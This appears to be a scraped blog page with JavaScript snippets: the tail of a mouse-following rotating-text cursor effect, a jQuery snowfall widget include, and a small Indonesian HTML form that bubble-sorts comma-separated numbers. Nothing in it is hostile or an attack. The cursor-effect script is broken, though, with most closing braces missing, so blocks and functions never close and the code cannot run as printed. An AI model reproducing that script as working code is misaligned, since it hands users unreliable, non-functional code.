var dom=document.getElementById; 
msg=msg.split(''); 
var n=msg.length; 
var a=size*10; 
var currStep=0; 
var ymouse=0; 
var xmouse=0; 
var props="<font face="+font+" size="+size+" color="+color+">"; 
 
if (ie) 
window.pageYOffset=0 
 
// writes the message 
if (ns){ 
for (i=0; i < n; i++) 
document.write('<layer name="nsmsg'+i+'" top=0 left=0 height='+a+' width='+a+'><center>'+props+msg[i]+'</font></center></layer>'); 

else if (ie||dom){ 
document.write('<div id="outer" style="position:absolute;top:0px;left:0px;z-index:30000;"><div style="position:relative">'); 
for (i=0; i < n; i++) 
document.write('<div id="iemsg'+(dom&&!ie? i:'')+'" style="position:absolute;top:0px;left:0;height:'+a+'px;width:'+a+'px;text-align:center;font-weight:normal;cursor:default">'+props+msg[i]+'</font></div>'); 
document.write('</div></div>'); 

(ns)?window.captureEvents(Event.MOUSEMOVE):0; 
 
function Mouse(evnt){ 
ymouse = (ns||(dom&&!ie))?evnt.pageY+20-(window.pageYOffset):event.y; // y-position 
xmouse = (ns||(dom&&!ie))?evnt.pageX+20:event.x-20; // x-position 

 
if (ns||ie||dom) 
(ns)?window.onMouseMove=Mouse:document.onmousemove=Mouse; 
var y=new Array(); 
var x=new Array(); 
var Y=new Array(); 
var X=new Array(); 
for (i=0; i < n; i++){ 
y[i]=0; 
x[i]=0; 
Y[i]=0; 
X[i]=0; 

 
var iecompattest=function(){ 
return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body; 

 
var makecircle=function(){ // rotation properties 
if (ie) outer.style.top=iecompattest().scrollTop+'px'; 
currStep-=rotation; 
for (i=0; i < n; i++){ // makes the circle 
var d=(ns)?document.layers['nsmsg'+i]:ie? iemsg[i].style:document.getElementById('iemsg'+i).style; 
d.top=y[i]+a*Math.sin((currStep+i*1)/3.8)+window.pageYOffset-15+(ie||dom? 'px' : ''); 
d.left=x[i]+a*Math.cos((currStep+i*1)/3.8)*2+(ie||dom? 'px' : ''); // remove *2 for just a plain circle, not oval 


 
var drag=function(){ // makes the resistance 
y[0]=Math.round(Y[0]+=((ymouse)-Y[0])*speed); 
x[0]=Math.round(X[0]+=((xmouse)-X[0])*speed); 
for (var i=1; i < n; i++){ 
y[i]=Math.round(Y[i]+=(y[i-1]-Y[i])*speed); 
x[i]=Math.round(X[i]+=(x[i-1]-X[i])*speed); 
 

makecircle(); 
// not rotation speed, leave at zero 
setTimeout(function(){drag();},10); 

if (ns||ie||dom) 
if ( typeof window.addEventListener != "undefined" ) 
window.addEventListener( "load", drag, false ); 
else if ( typeof window.attachEvent != "undefined" ) 
window.attachEvent( "onload", drag ); 
else { 
if ( window.onload != null ) { 
var oldOnload = window.onload; 
window.onload = function ( e ) { 
oldOnload( e ); 
drag(); 
}; 

else 
window.onload = drag; 

 

cursor_text_circle(); 
 
</script> 
 
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script> <script src='http://blogergadgets.googlecode.com/files/snowfall.min.jquery.js' type='text/javascript'></script> <script type="text/javascript"> $(document).snowfall({flakeCount:199}); </script>

short

<html>
<head>
<script LANGUAGE = "Javascript">
function Urutkan (form)

{

  DataKosong= false;
DataInputan = form.Data.value;

  inputData = DataInputan.split (",");

  for (var i = 0; i<inputData.length; i++)

    {

      inputData [i] = parseInt (inputData[i], 10);

      if (isNaN (inputData [i]) )

         {

            DataKosong = true;

            break;

         }

    }



inputData = bubbleSort (inputData, 0, inputData.length-1);

if (DataKosong)

  {

   alert ("Silakan Entri Dulu Data, Pisahkan dengan tanda Koma");

   form.Data.focus();

  }

   else

   form.Hasil.value = DataString (inputData,0);

}



function DataString (ArrayData, Angka)

{

  if ( (ArrayData.length - 1) >= Angka)

    return (ArrayData[Angka] + "," + DataString (ArrayData, (Angka + 1) ) );

  else

    return "";

}



function bubbleSort (ArrayData, Mulai, MulaiBaru)

{

  for (var i=MulaiBaru-1; i>=Mulai; i--)

  {

    for (var j=Mulai; j<=i; j++)

    {

      if (ArrayData[j+1] > ArrayData [j] )

      {

        var DataTemporer = ArrayData [j];

        ArrayData [j] = ArrayData [j+1];

        ArrayData[j+1] = DataTemporer;

      }

    }

  }

return ArrayData;

}

</script>

</head>



<body>

<center>

<form>

 Masukan Deretan Angka, Pisahkan denga Koma :

<hr>

<input type = text  name=Data size=30 Value="5,6,8,5,12,4,8,4,20">

<br>

  <br>

  <input type=button value="Urutkan" onClick="Urutkan (this.form)">

  <br>

  <br>

  <br>

    Hasil Pengurutan :

  <hr>

  <input type=text name=Hasil size=30>

</form>

</center>

</body>

</html>

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More